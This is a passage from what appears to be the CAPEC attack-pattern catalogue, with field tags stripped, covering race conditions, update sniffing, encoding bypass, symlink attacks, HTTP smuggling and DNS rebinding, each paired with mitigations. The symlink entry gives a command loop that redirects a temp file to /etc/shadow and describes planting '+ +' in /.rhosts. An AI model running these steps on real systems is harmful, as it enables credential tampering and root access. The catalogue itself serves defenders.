lead to a server crash or even the execution of arbitrary code. The targeted SOAP server must trust that the array size as stated in messages it receives is correct, but read through the entire content of the message regardless of the stated size of the array. High The attacker must be able to craft malformed SOAP messages, specifically, messages with arrays where the stated array size understates the actual size of the array in the message. If the server either verifies the correctness of the stated array size or if the server stops processing an array once the stated number of elements have been read, regardless of the actual array size, then this attack will fail. The former detects the malformed SOAP message while the latter ensures that the server does not attempt to load more data than was allocated for. 1000 Attack Pattern ChildOf 100 333 Category HasMember 368 Robin Cover, ed. XML and Web Services In The News XML Daily Newslink http://www.xml.org/xml/news/archives/archive.11292006.shtml Simple Object Access Protocol (SOAP) 1.1 5.4.2 Arrays W3C November 29, 2006 http://www.w3.org/TR/2000/NOTE-SOAP-20000508/#_Toc478383522 1000 Attack Pattern ChildOf 123 1000 Category ChildOf 262 CAPEC Content Team MITRE 2013-12-18 Updated Related_Attack_Patterns Abuse of transaction data strutcture Abuse of transaction data structure Attackers can capture application code bound for an authorized client during a dynamic update and can use it, as-is or through reverse-engineering, to glean sensitive information or exploit the trust relationship between the client and server. Set up a sniffer The attacker sets up a sniffer in the path between the server and the client and watches the traffic. The attacker sets up a sniffer in the path between the server and the client. env-ClientServer The attacker successfully sets up a sniffer in the path between the server and client. The attacker could not set up a sniffer in the path between the server and client. Check the network interface (e.g., ifconfig/ipconfig) to see whether the network adapter is running in promiscuous mode. Encrypt all communications between the server and client. Capturing Application Code Bound During Patching Attacker knows that the computer/OS/application periodically checks for an available update or that the end user can manually initiate a check for an update, loads the sniffer set up during Explore phase, and extracts the updated code from subsequent communication. The attacker then proceeds to reverse engineer the captured code. Attacker loads the sniffer to capture the application code bound during a dynamic update. env-Web The attacker proceeds to reverse engineer the captured code. env-All The attacker can capture the application code bound for the target. env-Web The communication between the server and client is encrypted. The attacker may still possible to lift key material from the client. env-Web The attacker captures the application code bound for the target and reverse engineers the captured code. Check the network interface (e.g., ifconfig) to detect the sniffer. Encrypt all communications between the server and client. The attacker must be able to employ a sniffer in the path between the server and client without being detected. The targeted application must be configured to periodically check for updates from the server. Medium Low API Abuse Protocol Manipulation In the following example, the attacker sets up a sniffer between a victim client and the server. The attacker sniffs the traffic and captures the jar file during patching. The attacker reverse engineers it to gain sensitive information, such as encryption keys, validation algorithms, applications patches, etc. Medium The attacker needs to setup a sniffer for a sufficient period of time so as to capture meaningful quantities of code. The presence of the sniffer should not be detected on the network. High The attacker needs to be able to reverse engineer any binary code captured during an update. The Attacker needs the ability to capture communications between the client and server during an update. In the case that encryption obscures client/server communication the attacker needs to lift key material from the client. Design: Encrypt all communication between the client and server. Implementation: Use SSL, SSH, SCP. Operation: Use "ifconfig/ipconfig" or other tools to detect the sniffer installed in the network. Confidentiality "Varies by context" Information Leakage Integrity Modify files or directories Accountability Authentication Authorization Non-Repudiation Gain privileges / assume identity 311 Targeted 1000 Attack Pattern ChildOf 65 Exploitation Reconnaissance High Medium Low Client-Server All All All CAPEC Content Team MITRE 2013-12-18 Updated Architectural_Paradigms, Attack_Motivation-Consequences, Attack_Phases, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, CIA_Impact, Description, Description Summary, Examples-Instances, Frameworks, Languages, Methods_of_Attack, Platforms, Purposes, Resources_Required, Solutions_and_Mitigations, Technical_Context, Type (Attack_Pattern -> Attack_Pattern), Typical_Likelihood_of_Exploit, Typical_Severity Attackers can capture application code bound for an authorized client during patching and can use it, as-is or through reverse-engineering, to glean sensitive information or exploit the trust relationship between the client and server. Set up a sniffer The attacker sets up a sniffer in the path between the server and the client and watches the traffic. The attacker sets up a sniffer in the path between the server and the client. env-ClientServer The attacker successfully sets up a sniffer in the path between the server and client. The attacker could not set up a sniffer in the path between the server and client. Check the network interface (e.g., ifconfig/ipconfig) to see whether the network adapter is running in promiscuous mode. Encrypt all communications between the server and client. Capturing Application Code Bound During Patching Attacker receives notification that the computer/OS/application has an available update for patching, loads the sniffer set up during Explore phase, and extracts patching code from subsequent communication. The attacker then proceeds to reverse engineer the captured code. Attacker loads the sniffer to capture the application code bound during patching. env-Web The attacker proceeds to reverse engineer the captured code. env-All The attacker can capture the application code bound for the target. env-Web The communication between the server and client is encrypted. The attacker may still possible to lift key material from the client. env-Web The attacker captures the application code bound for the target and reverse engineers the captured code. Check the network interface (e.g., ifconfig) to detect the sniffer. Encrypt all communications between the server and client. The attacker must be able to employ a sniffer in the path between the server and client without being detected. The targeted application must receive some patches from the server. Medium Low API Abuse Protocol Manipulation In the following example, the attacker sets up a sniffer between a victim client and the server www.server.com. The attacker sniffs the traffic and captures the jar file during patching. The attacker reverse engineers it to gain sensitive information, such as encryption keys, validation algorithms and such. Medium The attacker needs to setup a sniffer for a sufficient period of time so as to capture meaningful quantities of code. The presence of the sniffer should not be detected on the network. High The attacker needs to reverse engineer the binary code if the need be. The Attacker needs the ability to capture communications between the client and server during patching. In the case that encryption obscures client/server communication the attacker needs to lift key material from the client. Design: Encrypt all communication between the client and server. Implementation: Use SSL, SSH, SCP. Operation: Use "ifconfig/ipconfig" or other tools to detect the sniffer installed in the network. Confidentiality "Varies by context" Information Leakage Integrity Modify files or directories Confidentiality Read files or directories Accountability Authentication Authorization Non-Repudiation Gain privileges / assume identity 311 Targeted 1000 Attack Pattern ChildOf 65 http://capec.mitre.org/data/definitions/65.html Exploitation Reconnaissance High Medium Low Client-Server All All All Min Xu Cigital, Inc. Pre-review - 0.1 Romain Gaucher Cigital, Inc. Performed a review of content and added additional content Min Xu Cigital, Inc. Pre-review - 0.1 Romain Gaucher Cigital, Inc. Performed a review of content and added additional content This attack targets a race condition occurring when multiple processes access and manipulate the same resource concurrently and the outcome of the execution depends on the particular order in which the access takes place. The attacker can leverage a race condition by "running the race", modifying the resource and modifying the normal execution flow. For instance a race condition can occur while accessing a file, the attacker can trick the system by replacing the original file with his version and cause the system to read the malicious file. The attacker explores to gauge what level of access he has. The attacker gains access to a resource on the target host. The attacker modifies the targeted resource. The resource's value is used to determine the next normal execution action. The resource is modified/checked concurrently by multiple processes. By using one of the processes, the attacker is able to modify the value just before it is consumed by a different process. A race condition occurs and is exploited by the Attacker to abuse the target host. A resource is accessed/modified concurrently by multiple processes such that a race condition exists. The attacker has the ability to modify the resource. High High Time and State Modification of Resources The Net Direct client for Linux before 6.0.5 in Nortel Application Switch 2424, VPN 3050 and 3070, and SSL VPN Module 1000 extracts and executes files with insecure permissions, which allows local users to exploit a race condition to replace a world-writable file in /tmp/NetClient and cause another user to execute arbitrary code when attempting to execute this client, as demonstrated by replacing /tmp/NetClient/client. CVE-2007-1057 The following code illustrates a file that is accessed multiple times by name in a publicly accessible directory. A race condition exists between the accesses where an attacker can replace the file referenced by the name. include <sys/types.h> include <fcntl.h> include <unistd.h> define FILE "/tmp/myfile" define UID 100 void test(char *str) { int fd; fd = creat(FILE, 0644); if(fd == -1) return; chown(FILE, UID, -1); /* BAD */ close(fd); } int main(int argc, char **argv) { char *userstr; if(argc > 1) { userstr = argv[1]; test(userstr); } return 0; } [R.26.5] Medium Vulnerability testing tool can be used to probe for race condition. The attacker may also look for temporary file creation. The attacker may tries to replace them and take advantage of a race condition. Use safe libraries to access resources such as files. Be aware that improper use of access function calls such as chown(), tempfile(), chmod(), etc. can cause a race condition. Use synchronization to control the flow of execution. Use static analysis tools to find race conditions. Pay attention to concurrency problems related to the access of resources. Confidentiality Access_Control Authorization Gain privileges / assume identity Integrity Modify application data 368 Secondary 363 Secondary 366 Secondary 370 Secondary 362 Secondary 662 Targeted 689 Targeted 667 Targeted 665 Secondary 1000 Category ChildOf 172 Exploitation Low High Medium All All All All G. Hoglund G. McGraw Exploiting Software: How to Break Code Addison-Wesley February 2004 Common Weakness Enumeration (CWE) CWE-362 - Race Conditions Draft The MITRE Corporation 2007 http://cwe.mitre.org/data/definitions/362.html Wikipedia Race condition The Wikimedia Foundation, Inc http://en.wikipedia.org/wiki/Race_condition David Wheeler Secure programmer: Prevent race conditions IBM developerWorks IBM http://www.ibm.com/developerworks/linux/library/l-sprace/index.html Fortify Software SAMATE - Software Assurance Metrics And Tool Evaluation Test Case ID 1598 National Institute of Standards and Technology (NIST) 2006-06-22 http://samate.nist.gov/SRD/view_testcase.php?tID=1598 Eric Dalci Cigital, Inc 2007-01-25 Eric Dalci Cigital, Inc 2007-01-25 Sean Barnum Cigital, Inc 2007-03-07 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Name, Description, Attack Flow and Attack Prerequisites Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback MITRE Content Team MITRE 2013-06-21 Updated Example-Instance_Description Sean Barnum Cigital, Inc 2007-03-07 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Name, Description, Attack Flow and Attack Prerequisites Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback CAPEC Content Team MITRE 2013-12-18 Updated Related_Attack_Patterns CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases Attackers can capture new application installation code bound for an authorized client during initial distribution and can use it, as-is or through reverse-engineering, to glean sensitive information or exploit the trust relationship between the client and server. Set up a sniffer The attacker sets up a sniffer in the path between the server and the client and watches the traffic. The attacker sets up a sniffer in the path between the server and the client. env-ClientServer The attacker successfully sets up a sniffer in the path between the server and client. The attacker could not set up a sniffer in the path between the server and client. Check the network interface (e.g., ifconfig/ipconfig) to see whether the network adapter is running in promiscuous mode. Encrypt all communications between the server and client. Capturing Application Code Bound During Patching Attacker knows that the computer/OS/application can install additional components or full applications as requested by the user, loads the sniffer set up during Explore phase, and extracts the downloaded code from subsequent communication. The attacker then proceeds to reverse engineer the captured code and the communication protocols used. Attacker loads the sniffer to capture the application code bound during an initial installation. env-Web The attacker proceeds to reverse engineer the captured code. env-All The attacker can capture the application code bound for the target. env-Web The communication between the server and client is encrypted. The attacker may still possible to lift key material from the client. env-Web The attacker captures the application code bound for the target and reverse engineers the captured code. Check the network interface (e.g., ifconfig) to detect the sniffer. Encrypt all communications between the server and client. The attacker must be able to employ a sniffer in the path between the server and client without being detected. The targeted operating system or application must be configured to allow for end users to request new components and applications from the server. Medium Low API Abuse Protocol Manipulation In the following example, the attacker sets up a sniffer between a victim client and the server. The attacker sniffs the traffic and captures the installation of a new application. The attacker reverse engineers the traffic to gain sensitive information, such as encryption keys, validation algorithms, etc. Additionally the attacker now knows specific version information regarding an installed application on the victim client, and may use this information in subsequent social engineering or direct application attack. Medium The attacker needs to setup a sniffer for a sufficient period of time so as to capture meaningful quantities of code. The presence of the sniffer should not be detected on the network. High The attacker needs to be able to reverse engineer any binary code captured during an initial installation. The Attacker needs the ability to capture communications between the client and server during an initial installation. In the case that encryption obscures client/server communication the attacker needs to lift key material from the client. Design: Encrypt all communication between the client and server. Implementation: Use SSL, SSH, SCP. Operation: Use "ifconfig/ipconfig" or other tools to detect the sniffer installed in the network. Confidentiality "Varies by context" Information Leakage Integrity Modify files or directories Confidentiality Read files or directories Accountability Authentication Authorization Non-Repudiation Gain privileges / assume identity 311 Targeted 1000 Attack Pattern ChildOf 65 Exploitation Reconnaissance High Medium Low Client-Server All All All CAPEC Content Team MITRE 2013-12-18 Updated Architectural_Paradigms, Attack_Motivation-Consequences, Attack_Phases, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, CIA_Impact, Description, Examples-Instances, Frameworks, Languages, Methods_of_Attack, Platforms, Purposes, Resources_Required, Solutions_and_Mitigations, Technical_Context, Type (Attack_Pattern -> Attack_Pattern), Typical_Likelihood_of_Exploit, Typical_Severity An attacker who is authorized to send queries to a target sends variants of expected queries in the hope that these modified queries might return information (directly or indirectly through error logs) beyond what the expected set of queries should provide. Many client applications use specific query templates when interacting with a server and often automatically fill in specific fields or attributes. For example, a client that queries an employee database might have templates such that the user only supplies the target's name and the template dictates the fields to be returned (location, position in the company, phone number, etc.). If the server does not verify that the query matches one of the expected templates, an attacker who is allowed to send normal queries could modify their query to try to return additional information. In the above example, additional information might include social security numbers or salaries. Fuzzing techniques involve sending random or malformed messages to a target and monitoring the target's response. In this particular attack, the fuzzing is applied to the format of the expected templates, creating variants that request additional information, exclude limiting clauses, or alter fields that identify the requester in order to subvert access controls. The attacker may not know the names of fields to request or how other modifications will affect the server response, but by attempting multiple plausible variants, they might eventually trigger a server response that divulges sensitive information. Other possible outcomes include server crashes and resource consumption if the unexpected queries cause the server to enter an unstable state or perform excessive computation. The server must assume that the queries it receives follow specific templates and/or have fields or attributes that follow specific procedures. The server must process queries that it receives without adequately checking or sanitizing queries to ensure they follow these templates. Medium The attacker must have sufficient privileges to send queries to the targeted server. A normal client might limit the nature of these queries, so the attacker must either have a modified client or their own application which allows them to modify the expected queries. 1000 Attack Pattern ChildOf 116 CAPEC Content Team MITRE 2014-02-06 Updated Resources_Required This describes an attack where an application is forced to use a file that an attacker has corrupted. The result is often a denial of service caused by the application being unable to process the corrupted file, but other results, including the disabling of filters or access controls (if the application fails in an unsafe way rather than failing by locking down) or buffer overflows are possible. The targeted application must utilize a configuration file that an attacker is able to corrupt. In some cases, the attacker must be able to force the (re-)reading of the corrupted file if the file is normally only consulted at startup. The severity of the attack hinges on how the application responds to the corrupted file. If the application detects the corruption and locks down, this may result in the denial of services provided by the application. If the application fails to detect the corruption, the result could be a more severe denial of service (crash or hang) or even an exploitable buffer overflow. If the application detects the corruption but fails in an unsafe way, this attack could result in the continuation of services but without certain security structures, such as filters or access controls. For example, if the corrupted file configures filters, an unsafe response from an application could result in simply disabling the filtering mechanisms due to the lack of usable configuration data. Medium This varies depending on the resources necessary to corrupt the configuration file and the resources needed to force the application to re-read it (if any). 1000 Attack Pattern ChildOf 165 An attacker manipulates environment variables used by an application to perform a variety of possible attacks. Changing variable values is usually undertaken as part of another attack; for example, a path traversal (inserting relative path modifiers) or buffer overflow (enlarging a variable value beyond an application's ability to store it). The targeted application must rely on external variables in such a way that malicious manipulation of them can subvert functionality. The attacker must be able to manipulate the targeted environment variables, either at runtime or by accessing a configuration file or manipulating start-up values. Design: Ensure that variables that should not be manipulated by a user are not accessible to them. 471 Targeted 20 Targeted 1000 Attack Pattern ChildOf 171 CAPEC Content Team MITRE 2013-12-18 Updated Attack_Prerequisites, Description, Description Summary, Related_Attack_Patterns, Related_Weaknesses, Resources_Required, Solutions_and_Mitigations, Type (Attack_Pattern -> Attack_Pattern) An attacker manipulates global variables used by an application to perform a variety of possible attacks. Changing variable values is usually undertaken as part of another attack; for example, a path traversal (inserting relative path modifiers) or buffer overflow (enlarging a variable value beyond an application's ability to store it). The targeted application must rely on external variables in such a way that malicious manipulation of them can subvert functionality. The attacker must be able to manipulate the targeted global variables, either at runtime or by accessing a configuration file or manipulating start-up values. Design: Range, size and value and consistency verification for any arguments supplied to application from external sources and devise appropriate error response. Design: Ensure that variables that should not be manipulated by a user are not accessible to them. 471 Targeted 20 Targeted 1000 Attack Pattern ChildOf 171 CAPEC Content Team MITRE 2013-12-18 Updated Attack_Prerequisites, Description, Description Summary, Related_Attack_Patterns, Related_Weaknesses, Resources_Required, Solutions_and_Mitigations CAPEC Content Team MITRE 2014-02-06 Updated Description Summary 1000 Attack Pattern ChildOf 153 This attack leverages the possibility to encode potentially harmful input and submit it to applications not expecting or effective at validating this encoding standard making input filtering difficult. Survey the application for user-controllable inputs Using a browser, an automated tool or by inspecting the application, an attacker records all entry points to the application. Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL. env-Web Use a proxy tool to record all user input entry points visited during a manual traversal of the web application. env-Web Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery. env-Web Manually inspect the application to find entry points. env-All Inputs are used by the application or the browser (DOM) env-All env-Web Using URL rewriting, parameters may be part of the URL path. env-Web No parameters appear to be used by the application. Even though none appear, the application may still use them if they are provided. env-Web No inputs seem to be used by the application. They might still be provided to another component (web service, database, system call, etc.). env-All env-Web Applications that have only static pages or that simply present information without accepting input are unlikely to be susceptible. env-Web A list of entry points (URL, parameters, configuration files, etc.) is created by the attacker. A list of resources accessed by the application is created by the attacker. Monitor velocity of page fetching in web logs. Humans who view a page and select a link from it will click far slower and far less regularly than tools. Tools make requests very quickly and the requests are typically spaced apart regularly (e.g. 0.8 seconds between them). Create links on some pages that are visually hidden from web browsers. Using iframes, images, or other HTML techniques, the links can be hidden from web browsing humans, but visible to spiders and programs. A request for the page, then, becomes a good predictor of an automated tool probing the application. Use CAPTCHA to prevent the use of the application by an automated tool. Actively monitor the application and either deny or redirect requests from origins that appear to be automated. Probe entry points to locate vulnerabilities The attacker uses the entry points gathered in the "Explore" phase as a target list and injects various payloads using a variety of different types of encodings to determine if an entry point actually represents a vulnerability with insufficient validation logic and to characterize the extent to which the vulnerability can be exploited. Try to use different encodings of content in order to bypass validation routines. env-All env-Web The application accepts user-controllable input. env-All env-Web The attacker's encoded payload is processed and acted on by the application without filtering or transcoding. The application decodes the charset and filters the inputs. Monitor inputs to web servers. Alert on unusual charset and/or characters. Implement input validation routines that canonicalize and filter user submitted content. Specify the charset of the HTTP transaction/content. Actively monitor the application and either deny or redirect requests from origins that appear to be attack attempts. The application's decoder accepts and interprets encoded characters. Data canonicalization, input filtering and validating is not done properly leaving the door open to harmful characters for the target host. High High Injection Protocol Manipulation API Abuse Microsoft Internet Explorer 5.01 SP4, 6, 6 SP1, and 7 does not properly handle unspecified "encoding strings," which allows remote attackers to bypass the Same Origin Policy and obtain sensitive information via a crafted web site, aka "Post Encoding Information Disclosure Vulnerability." Related Vulnerabilities CVE-2010-0488 Low An attacker can inject different representation of a filtered character in a different encoding. Medium An attacker may craft subtle encoding of input data by using the knowledge that he/she has gathered about the target host. Attacker may try to inject dangerous characters using different encoding using (example of invalid UTF-8 characters, overlong UTF-8, Chinese characters in Big-5, etc.). The attacker hopes that the targeted system does poor input filtering for all the different possible representations of the malicious characters. Malicious inputs can be sent through an HTML form, directly encoded in the URL or as part of a database query. The attacker can use scripts or automated tools to probe for poor input filtering. Assume all input might use an improper representation. Use canonicalized data inside the application; all data must be converted into the representation used inside the application (UTF-8, UTF-16, etc.) Assume all input is malicious. Create a white list that defines all valid input to the software system based on the requirements specifications. Input that does not match against the white list should not be permitted to enter into the system. Test your decoding process against malicious input. Integrity Modify files or directories Confidentiality Read files or directories Integrity Modify application data Confidentiality Read memory Integrity Modify memory Confidentiality Read application data Authorization Execute unauthorized code or commands Run Arbitrary Code Accountability Authentication Authorization Non-Repudiation Gain privileges / assume identity Access_Control Authorization Bypass protection mechanism Availability DoS: amplification DoS: crash / exit / restart DoS: instability DoS: resource consumption (CPU) DoS: resource consumption (memory) DoS: resource consumption (other) Denial of Service 173 Targeted 172 Targeted 180 Targeted 181 Targeted 171 Secondary 73 Targeted 21 Targeted 74 Secondary 20 Secondary 697 Targeted 692 Targeted 1000 Attack Pattern ChildOf 153 http://capec.mitre.org/data/definitions/18.html Reluctance to Trust Penetration High High Medium Client-Server n-Tier All All All WASC Threat Classification 2.0 WASC-20 - Improper Input Handling The Web Application Security Consortium (WASC) 2010 http://projects.webappsec.org/Improper-Input-Handling OWASP Category: Encoding The Open Web Application Security Project (OWASP) http://www.owasp.org/index.php/Category:Encoding OWASP Canonicalization, locale and Unicode The Open Web Application Security Project (OWASP) http://www.owasp.org/index.php/Canonicalization,_locale_and_Unicode OWASP XSS (Cross Site Scripting) Prevention Cheat Sheet The Open Web Application Security Project (OWASP) http://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet David Wheeler Secure Programming for Linux and Unix HOWTO Chapter 5 Section 9: Character Encoding http://www.dwheeler.com/secure-programs/Secure-Programs-HOWTO/character-encoding.html Wikipedia Character encoding The Wikimedia Foundation, Inc http://en.wikipedia.org/wiki/Character_encoding Eric Hacker IDS Evasion with Unicode January 3, 2001 http://www.securityfocus.com/infocus/1232 Romain Gaucher Cigital, Inc. Pre-review - 0.1 Romain Gaucher Cigital, Inc. Pre-review - 0.1 CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases The attacker injects, manipulates, deletes, or forges malicious log entries into the log file, in an attempt to mislead an audit of the log file or cover tracks of an attack. Due to either insufficient access controls of the log files or the logging mechanism, the attacker is able to perform such actions. The target host is logging the action and data of the user. The target host insufficiently protects access to the logs or logging mechanisms. The attacker must understand how the logging mechanism works. Optionally, the attacker must know the location and the format of individual entries of the log files. 1000 Category ChildOf 262 CAPEC Content Team MITRE 2013-12-18 Updated Attack_Prerequisites, Description, Description Summary, Related_Attack_Patterns, Resources_Required 1000 Category ChildOf 262 CAPEC Content Team MITRE 2013-12-18 Updated Related_Attack_Patterns This attack leverages the use of symbolic links (Symlinks) in order to write to sensitive files. An attacker can create a Symlink link to a target file not otherwise accessible to her. When the privileged program tries to create a temporary file with the same name as the Symlink link, it will actually write to the target file pointed to by the attackers' Symlink link. If the attacker can insert malicious content in the temporary file she will be writing to the sensitive file by using the Symlink. The race occurs because the system checks if the temporary file exists, then creates the file. The attacker would typically create the Symlink during the interval between the check and the creation of the temporary file. Verify that target host's platform supports symbolic links. This attack pattern is only applicable on platforms that support symbolic links. Research target platform to determine whether it supports symbolic links. env-Embedded env-Local Create a symbolic link and ensure that it works as expected on the given platform. env-Embedded env-Local Target platform supports symbolic links (e.g. Linux, UNIX, etc.) Target platform does not support symbolic links (e.g. MS Windows) Examine application's file I/O behavior Analyze the application's file I/O behavior to determine where it stores files, as well as the operations it performs to read/write files. Use kernel tracing utility such as ktrace to monitor application behavior env-Local Use debugging utility such as File Monitor to monitor the application's filesystem I/O calls env-Local Watch temporary directories to see when temporary files are created, modified and deleted. env-Embedded env-Local Analyze source code for open-source systems like Linux, Apache, etc. env-Embedded env-Local Attacker can watch files being created, modified and/or deleted by application. env-Embedded env-Local Application does not seem to perform any filesystem I/O operations. env-Embedded env-Local Attacker identifies at least one reproducible file I/O operation performed by the application. Attacker cannot identify any file I/O operations being performed by the application. Verify ability to write to filesystem The attacker verifies ability to write to the target host's file system. Create a file that does not exist in the target directory (e.g. "touch temp.txt" in UNIX-like systems) env-Embedded env-Local On platforms that differentiate between file creation and file modification, if the target file that the application writes to already exists, attempt to modify it. env-Embedded env-Local Verify permissions on target directory env-Embedded env-Local Target directory is a globally writable temp directory (e.g. /tmp in many UNIX-like systems) env-Embedded env-Local Target directory is writable by the attackers' effective user ID. env-Embedded env-Local Attacker can create and modify files in the target directory. Attacker cannot create or modify files in the target directory. Store temporary files in a directory with limited permissions where malicious users cannot tamper with them. Replace file with a symlink to a sensitive system file. Between the time that the application checks to see if a file exists (or if the user has access to it) and the time the application actually opens the file, the attacker replaces the file with a symlink to a sensitive system file. Create an infinite loop containing commands such as "rm -f tempfile.dat; ln -s /etc/shadow tempfile.dat". Wait for an instance where the following steps occur in the given order: (1) Application ensures that tempfile.dat exists and that the user has access to it, (2) "rm -f tempfile.dat; ln -s /etc/shadow tempfile.dat", and (3) Application opens tempfile.dat for writing, and inadvertently opens /etc/shadow for writing instead. env-Embedded env-Local Use other techniques with debugging tools to replace the file between the time the application checks the file and the time the application opens it. env-Embedded env-Local Sensitive file tampered with successfully. Sensitive file could not be tampered with. Use file handles to check existence of files, to check permissions and to open them. Do not use filename except to obtain a handle initially. Drop application's permissions to the current user's permissions before performing any file I/O operations (e.g. using Process.as_uid() in Ruby). Run application with minimal permissions. In particular, avoid running applications as root on UNIX-like systems and as Administrator on Windows systems. The attacker is able to create Symlink links on the target host. Tainted data from the attacker is used and copied to temporary files. The target host does insecure temporary file creation. High Medium Injection Time and State Modification of Resources In this naive example, the Unix program foo is setuid. Its function is to retrieve information for the accounts specified by the user. For "efficiency," it sorts the requested accounts into a temporary file (/tmp/foo naturally) before making the queries. The directory /tmp is world-writable. Malicious user Mallory creates a symbolic link to the file /.rhosts named /tmp/foo. Then, she invokes foo with + + as the requested account. The program creates the (temporary) file /tmp/foo (really creating /.rhosts) and puts the requested account (+ +) in it. It removes the temporary file (merely removing the symbolic link). Now the /.rhosts contains + +, which is the incantation necessary to allow anyone to use rlogin to log into the computer as the superuser. [R.27.1] GNU ed before 0.3 allows local users to overwrite arbitrary files via a symlink attack on temporary files, possibly in the open_sbuf function. CVE-2006-6939 OpenmosixCollector and OpenMosixView in OpenMosixView 1.5 allow local users to overwrite or delete arbitrary files via a symlink attack on (1) temporary files in the openmosixcollector directory or (2) nodes.tmp. CVE-2005-0894 Setuid product allows file reading by replacing a file being edited with a symlink to the targeted file, leaking the result in error messages when parsing fails. CVE-2000-0972 Medium This attack is sophisticated because the attacker has to overcome a few challenges such as creating symlinks on the target host during a precise timing, inserting malicious data in the temporary file and have knowledge about the temporary files created (file name and function which creates them). The attacker will certainly look for file system locations where he can write and create Symlink links. The attacker may also observe the system and locate the temporary files created during a call to a certain function. Use safe libraries when creating temporary files. For instance the standard library function mkstemp can be used to safely create temporary files. For shell scripts, the system utility mktemp does the same thing. Access to the directories should be restricted as to prevent attackers from manipulating the files. Denying access to a file can prevent an attacker from replacing that file with a link to a sensitive file. Follow the principle of least privilege when assigning access rights to files. Ensure good compartmentalization in the system to provide protected areas that can be trusted. Integrity Modify application data Confidentiality Access_Control Authorization Gain privileges / assume identity Availability DoS: resource consumption (other) Denial of Service The content of the temporary file which is copied to the file pointed to by the Symlink. The content of the file overwritten when writing to the Symlink. The new content of the targeted file. This attack can cause privilege escalation, modification of resources or denial of services. 367 Targeted 61 Targeted 662 Targeted 689 Targeted 667 Targeted 1000 Attack Pattern ChildOf 29 1000 Attack Pattern ChildOf 26 Least Privilege Exploitation High High Low All All All All Wikipedia Symlink race The Wikimedia Foundation, Inc http://en.wikipedia.org/wiki/Symlink_race mkstemp IEEE Std 1003.1, 2004 Edition The Open Group Base Specifications Issue 6 http://www.opengroup.org/onlinepubs/009695399/functions/mkstemp.html Eric Dalci Cigital, Inc 2007-02-01 Eric Dalci Cigital, Inc 2007-02-01 Sean Barnum Cigital, Inc 2007-03-08 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Name, Description, Likelihood and Related Attack Patterns Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback Amit Sethi Cigital, Inc. 2007-10-29 Added extended Attack Execution Flow MITRE Content Team MITRE 2013-06-21 Updated Example-Instance_Description Sean Barnum Cigital, Inc 2007-03-08 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Name, Description, Likelihood and Related Attack Patterns Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback Amit Sethi Cigital, Inc. 2007-10-29 Added extended Attack Execution Flow CAPEC Content Team MITRE 2013-12-18 Updated Attack_Phases CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases, Description Summary, Payload 1000 Attack Pattern ChildOf 269 1000 Category ChildOf 262 CAPEC Content Team MITRE 2013-12-18 Updated Related_Attack_Patterns The attacker subverts a communications protocol to perform an attack. These attacks can allow the attacker to impersonate others, discover sensitive information, control the outcome of a session, or perform other attacks. These attacks target invalid assumptions that may be inherent in implementers of the protocol, incorrect implementations of the protocol, or vulnerabilities in the protocol itself. The protocol or implementations thereof must contain bugs that an attacker can exploit. Medium In some variants of this attack the attacker must be able to intercept communications using the protocol. This means they need to be able to receive the communications from one participant and prevent the other participant from receiving these communications. 1000 Category ChildOf 262 CAPEC Content Team MITRE 2013-12-18 Updated Related_Attack_Patterns An attacker injects content into a server response that is interpreted differently by intermediaries than it is by the target browser. To do this, it takes advantage of inconsistent or incorrect interpretations of the HTTP protocol by various applications. For example, it might use different block terminating characters (CR or LF alone), adding duplicate header fields that browsers interpret as belonging to separate responses, or other techniques. Consequences of this attack can include response-splitting, cross-site scripting, apparent defacement of targeted sites, cache poisoning, or similar actions. The targeted server must allow the attacker to insert content that will appear in the server's response. Medium No special resources are needed for this attack. Design: Employ strict adherence to interpretations of HTTP messages wherever possible. Implementation: Encode header information provided by user input so that user-supplied content is not interpreted by intermediaries. 74 Secondary 436 Targeted 1000 Attack Pattern ChildOf 220 1000 Attack Pattern PeerOf 33 333 Category HasMember 360 HTTP Response Smuggling Beyond Security http://www.securiteam.com/securityreviews/5CP0L0AHPC.html WASC Threat Classification 2.0 WASC-27 - HTTP Response Smuggling The Web Application Security Consortium (WASC) 2010 http://projects.webappsec.org/HTTP-Response-Smuggling An attacker modifies the HTTP Verb (e.g. GET, PUT, TRACE, etc.) in order to bypass access restrictions. Some web environments allow administrators to restrict access based on the HTTP Verb used with requests. However, attackers can often provide a different HTTP Verb, or even provide a random string as a verb in order to bypass these protections. This allows the attacker to access data that should otherwise be protected. The targeted system must attempt to filter access based on the HTTP verb used in requests. Medium The attacker requires a tool that allows them to manually control the HTTP verb used to send messages to the targeted server. Design: Ensure that only legitimate HTTP verbs are allowed. Design: Do not use HTTP verbs as factors in access decisions. 302 Targeted 654 Secondary 1000 Attack Pattern ChildOf 220 Arshan Dabirsiaghi Bypassing Web Authentication and Authorization with HTTP Verb Tampering: How to inadvertently allow attackers full access to your web application Aspect Security http://mirror.transact.net.au/sourceforge/w/project/wa/waspap/waspap/Core/Bypassing_VBAAC_with_HTTP_Verb_Tampering.pdf CAPEC Content Team MITRE 2014-02-06 Updated Resources_Required An attacker serves content whose IP address is resolved by a DNS server that it controls and after initial contact by a web browser or similar client it changes the IP address to which its name resolves to an address within the target browser's organization that is not publicly accessible, thus allowing the web browser to examine this internal address on its behalf. Web browsers enforce security zones based on DNS names in order to prevent cross-zone disclosure of information. In a DNS binding attack an attacker publishes content on their own server with their own name and DNS server. The first time the target accesses the attackers' content, the attackers' name must be resolved to an IP address. The attacker's DNS server performs this resolution, providing a short Time-To-Live (TTL) in order to prevent the target from caching the value. When the target makes a subsequent request to the attackers' content the attackers' DNS server must again be queried, but this time the DNS server returns an address internal to the target's organization that would not be accessible 